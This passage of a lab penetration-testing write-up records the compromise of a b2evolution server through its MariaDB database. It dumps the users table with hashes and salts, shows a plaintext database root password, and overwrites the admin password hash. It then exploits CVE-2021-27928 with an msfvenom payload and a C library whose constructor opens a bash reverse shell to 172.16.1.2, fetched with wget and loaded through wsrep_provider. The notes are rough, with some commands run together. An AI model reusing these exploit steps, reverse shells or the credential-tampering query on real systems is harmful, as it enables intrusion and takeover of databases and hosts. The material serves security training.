| evo_regional__region |
| evo_regional__subregion |
| evo_sessions |
| evo_settings |
| evo_skins__container |
| evo_skins__skin |
| evo_slug |
| evo_subscriptions |
| evo_syslog |
| evo_temporary_ID |
| evo_track__goal |
| evo_track__goalcat |
| evo_track__goalhit |
| evo_track__keyphrase |
| evo_users |
| evo_users__fielddefs |
| evo_users__fieldgroups |
| evo_users__fields |
| evo_users__invitation_code |
| evo_users__organization |
| evo_users__profile_visits |
| evo_users__reports |
| evo_users__secondary_user_groups |
| evo_users__user_org |
| evo_users__usersettings |
| evo_widget |
+----------------------------------------+
92 rows in set (0.001 sec)
sh
select * from evo_users;
+---------+------------+----------------------------------+-----------+------------------+-------------+-----------------+---------------+---------------------+----------------+---------------+---------------+----------+------------+-------------+----------------------------------+-------------+--------------+--------------+------------------+--------------+-------------+---------------+--------------+-------------+-----------------------+---------------------+-------------------+-------------------------+
| user_ID | user_login | user_pass | user_salt | user_pass_driver | user_grp_ID | user_email | user_status | user_avatar_file_ID | user_firstname | user_lastname | user_nickname | user_url | user_level | user_locale | user_unsubscribe_key | user_gender | user_age_min | user_age_max | user_reg_ctry_ID | user_ctry_ID | user_rgn_ID | user_subrg_ID | user_city_ID | user_source | user_created_datetime | user_lastseen_ts | user_email_dom_ID | user_profileupdate_date |
+---------+------------+----------------------------------+-----------+------------------+-------------+-----------------+---------------+---------------------+----------------+---------------+---------------+----------+------------+-------------+----------------------------------+-------------+--------------+--------------+------------------+--------------+-------------+---------------+--------------+-------------+-----------------------+---------------------+-------------------+-------------------------+
| 1 | admin | ff825173... | NUDB6eh8 | evo$salted | 1 | admin@localhost | autoactivated | 1 | Johnny | Admin | NULL | NULL | 10 | en-US | GVOKN2gKuUmvg8FbnuyLAPemsVk2Crlz | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-26 17:16:55 | 2022-07-26 17:20:43 | 1 | 2022-07-26 17:18:55 |
| 2 | mary | aa31667e... | rexBqE6b | evo$salted | 2 | admin@localhost | autoactivated | 4 | Mary | Wilson | NULL | NULL | 4 | en-US | Z5kfHcq9MhfQnLy2SYoxFpNGzxnhTOPG | F | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-26 17:18:56 | NULL | 1 | 2022-07-26 17:18:55 |
| 3 | jay | 3415c989... | Je1jR2nP | evo$salted | 2 | admin@localhost | autoactivated | 5 | Jay | Parker | NULL | NULL | 3 | en-US | nQzIGvychEpBTBL7hVOGVVeDo7WeWEhT | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-26 05:11:49 | NULL | 1 | 2022-07-26 17:18:55 |
| 4 | dave | dee15d7c... | 02Vh93jl | evo$salted | 3 | admin@localhost | autoactivated | 6 | David | Miller | NULL | NULL | 2 | en-US | EsxyhyZLS6QasBedQhJ1X5aBtY60npMD | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-25 10:27:06 | NULL | 1 | 2022-07-26 17:18:55 |
| 5 | paul | 1a4cba96... | bO0Qbxp6 | evo$salted | 3 | admin@localhost | autoactivated | 7 | Paul | Jones | NULL | NULL | 1 | en-US | xfq4O1lfb1bQ2127UafXvgwHnNFZhI4Z | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-24 10:24:59 | NULL | 1 | 2022-07-26 17:18:55 |
| 6 | larry | 0fd256a1... | E4thLqqZ | evo$salted | 4 | admin@localhost | autoactivated | 8 | Larry | Smith | NULL | NULL | 0 | en-US | Vauk4DrKq6sFaifDREu5ClcYqxIEPPRj | M | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-23 19:28:06 | NULL | 1 | 2022-07-26 17:18:55 |
| 7 | kate | 599bafac... | eW762vXg | evo$salted | 4 | admin@localhost | autoactivated | 9 | Kate | Adams | NULL | NULL | 0 | en-US | vS9Z7FPgxGAfOefkVPwZ5jzkVqxeJMqP | F | NULL | NULL | NULL | 233 | NULL | NULL | NULL | NULL | 2022-07-23 05:24:00 | NULL | 1 | 2022-07-26 17:18:55 |
| 8 | test | f9a86421... | WJVci6K1 | evo$salted | 4 | test@email.com | autoactivated | NULL | | | NULL | NULL | 1 | en-US | nMxLt7Tof7pLo2j7Zx9fUxM91NiKMY9s | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | menu link | 2025-02-18 15:03:06 | 2025-02-18 15:03:06 | 3 | 2025-02-18 15:03:06 |
+---------+------------+----------------------------------+-----------+------------------+-------------+-----------------+---------------+---------------------+----------------+---------------+---------------+----------+------------+-------------+----------------------------------+-------------+--------------+--------------+------------------+--------------+-------------+---------------+--------------+-------------+-----------------------+---------------------+-------------------+-------------------------+
8 rows in set (0.001 sec)- looking at the hashing it returns
md5 salt.passmode
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'CVE-2021-27928
- https://github.com/Al1ex/CVE-2021-27928
- MysSQL version 10.5.8-MariaDB
sh
select version();
+-------------------------------------+
| version() |
+-------------------------------------+
| 10.5.8-MariaDB-1:10.5.8+maria~focal |
+-------------------------------------+
1 row in set (0.001 sec)sh
www-data@pm:/var/www/html/media/users/test/comments/p20$ uname -m
uname -m
x86_64sh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.16.1.2 LPORT=1235 -f elf-so -o CVE-2021-27928.sosh
www-data@pm:/tmp$ wget http://172.16.1.2/CVE-2021-27928.sosh
SET GLOBAL wsresp_provider="/usr/lib/galera/libgalera_smm.so";sh
www-data@pm:/tmp$ ls -al /usr/lib/galera/libgalera_smm.so
ls -al /usr/lib/galera/libgalera_smm.so
-rw-r--r-- 1 root root 68466736 Oct 22 2020 /usr/lib/galera/libgalera_smm.sosh
MariaDB [b2evolution]> UPDATE evo_users SET user_pass = 'f9a86421...', user_salt = 'WJVci6K1' WHERE user_ID = 1;sh
══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 pm pm 220 Feb 25 2020 /home/pm/.bash_logout
-rw------- 1 root root 0 Feb 23 2022 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw-r--r-- 1 www-data www-data 2954 Jul 26 2022 /var/www/html/.htaccess
-rw-r--r-- 1 www-data www-data 95 Jul 26 2022 /var/www/html/_cache/.htaccess
-rw-r--r-- 1 landscape landscape 0 Feb 23 2022 /var/lib/landscape/.cleanup.usersh
-rwxr-xr-x 1 root root 37715 Nov 10 2020 /usr/bin/wsrep_sst_mariabackupsh
╔══════════╣ Files inside others home (limit 20)
/home/pm/.mysql_history
/home/pm/.sudo_as_admin_successful
/home/pm/.bash_logout
/home/pm/.bash_history
/home/pm/.bashrc
/home/pm/.profilesh
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)sh
mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2- compile
malicious.c
c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor)) void inject() {
system("bash -c 'bash -i >& /dev/tcp/172.16.1.2/1235 0>&1'");
}sh
gcc -shared -o /tmp/malicious.so -fPIC malicious.csh
www-data@pm:/var/www/html$ wget http://172.16.1.1/malicious.so
www-data@pm:/var/www/html$ chmod +x /usr/lib/galera/malicious.sosh
python3 -c 'import pty; pty.spawn("/bin/bash")'- have to run it twice if it fails
- the main issue was
/tmpwas not control by us it has to be/var/www/html
sh
mysql -u root -p'B2pMdatAB4sE22!'
MariaDB [(none)]> SET GLOBAL wsrep_provider='/var/www/html/malicious.so';
SET GLOBAL wsrep_provider='/var/www/html/malicious.so';
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [(none)]> SSET GLOBAL wsrep_provider='/var/www/html/malicious.so';
SET GLOBAL wsrep_provider='/var/www/html/malicious.so';
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 6
Current database: *** NONE ***
Up next
MediumFeb 2025
VHL — Tracker
MantisBT bug tracker on Debian with POP3. Credential enumeration via mail service and MantisBT RCE for shell access.
Read writeup
HardFeb 2025
HTB — Checker
TeamCity authentication bypass combined with Bookstack SSRF to read internal files and chain into remote code execution.
Read writeup
MediumMar 2025
HTB — Cypher
Neo4j Cypher injection bypasses authentication. APOC procedure abuse executes OS commands for initial access and privesc.
Read writeup